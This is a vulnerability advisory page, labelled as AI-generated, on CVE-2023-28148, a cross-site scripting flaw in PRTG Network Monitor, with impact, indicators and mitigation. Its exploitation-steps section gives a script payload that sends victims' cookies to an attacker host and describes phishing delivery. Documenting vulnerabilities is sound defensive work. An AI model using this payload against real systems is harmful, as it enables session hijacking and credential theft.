Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2023-28148
PRTG Network Monitor vulnerability analysis and mitigation

Overview

CVE-2023-28148 is a cross-site scripting (XSS) vulnerability in the bodyclass parameter of Paessler PRTG Network Monitor, affecting all versions prior to 23.3.86.1520. The flaw allows unauthenticated, network-based attackers to inject malicious scripts that execute in the browsers of other users viewing the affected page. It carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Feedly).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of the bodyclass parameter before it is rendered in the HTML output of PRTG's web interface. Because no authentication is required and attack complexity is low, an attacker can craft a malicious URL or request that injects arbitrary JavaScript into the page body class attribute. The scope is marked as "Changed," indicating that the injected script can affect resources beyond the vulnerable component itself (i.e., other users' browser sessions) (GitHub Advisory, Feedly). No public proof-of-concept code has been identified at this time.

Impact

Successful exploitation allows an unauthenticated attacker to inject and execute malicious JavaScript in the browsers of authenticated PRTG users, enabling theft of session tokens, credentials, or sensitive monitoring data displayed within the PRTG interface. Because PRTG Network Monitor is commonly used for infrastructure monitoring, compromised sessions could expose network topology, device credentials, and alert configurations. Availability is not directly impacted, but confidentiality and integrity are both affected at a low-to-moderate level (GitHub Advisory, Feedly).

Exploitability

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation for CVE-2023-28148 at this time. The EPSS score is reported as 0.0, indicating a very low probability of exploitation in the near term. The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Feedly, GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing or internally accessible Paessler PRTG Network Monitor instances running versions prior to 23.3.86.1520 using tools like Shodan, Censys, or internal network scanning.
  2. Craft malicious payload: Construct a URL or HTTP request targeting the PRTG web interface that injects a malicious value into the bodyclass parameter (e.g., appending a JavaScript payload such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  3. Deliver the payload: Distribute the crafted URL to authenticated PRTG users via phishing email, chat message, or other social engineering vectors, or embed it in a page that PRTG users are likely to visit.
  4. Script execution: When a victim user clicks the link and loads the PRTG page, the injected script executes in their browser within the PRTG application context.
  5. Harvest credentials/tokens: The attacker's script exfiltrates session cookies, authentication tokens, or other sensitive data displayed in the PRTG interface to an attacker-controlled server, enabling session hijacking or further lateral movement (GitHub Advisory, Feedly).

Indicators of compromise

  • Network: Outbound HTTP/HTTPS requests from victim browsers to unexpected external domains immediately after loading PRTG pages; unusual GET/POST requests to attacker-controlled infrastructure containing encoded cookie or token data.
  • Logs: PRTG web server access logs showing requests to PRTG pages with unusual or encoded values in the bodyclass parameter; repeated access from the same IP to PRTG pages with script-like query strings.
  • Browser/Application: Unexpected JavaScript execution or redirects when loading PRTG web interface pages; browser developer console errors related to Content Security Policy violations if CSP is deployed.

Mitigation and workarounds

The primary remediation is to upgrade Paessler PRTG Network Monitor to version 23.3.86.1520 or later, which resolves the bodyclass XSS issue (GitHub Advisory, Paessler Release History). As interim mitigations, administrators should implement Content Security Policy (CSP) headers on the PRTG web interface to limit the impact of any injected scripts, and restrict access to the PRTG web interface to trusted networks or VPN-only access. Input validation and output encoding for the bodyclass parameter should be enforced at the application layer if a custom deployment allows for such configuration.

Additional resources


SourceThis report was generated using AI

Related PRTG Network Monitor vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2023-45858HIGH8.6
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesSep 14, 2026
CVE-2023-28148HIGH7.2
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesSep 14, 2026
CVE-2025-67835MEDIUM6.5
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesJan 14, 2026
CVE-2023-22632LOW2.7
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesSep 14, 2026
CVE-2023-22631LOW2.7
  • PRTG Network Monitor logoPRTG Network Monitor
  • cpe:2.3:a:paessler:prtg_network_monitor
NoYesSep 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management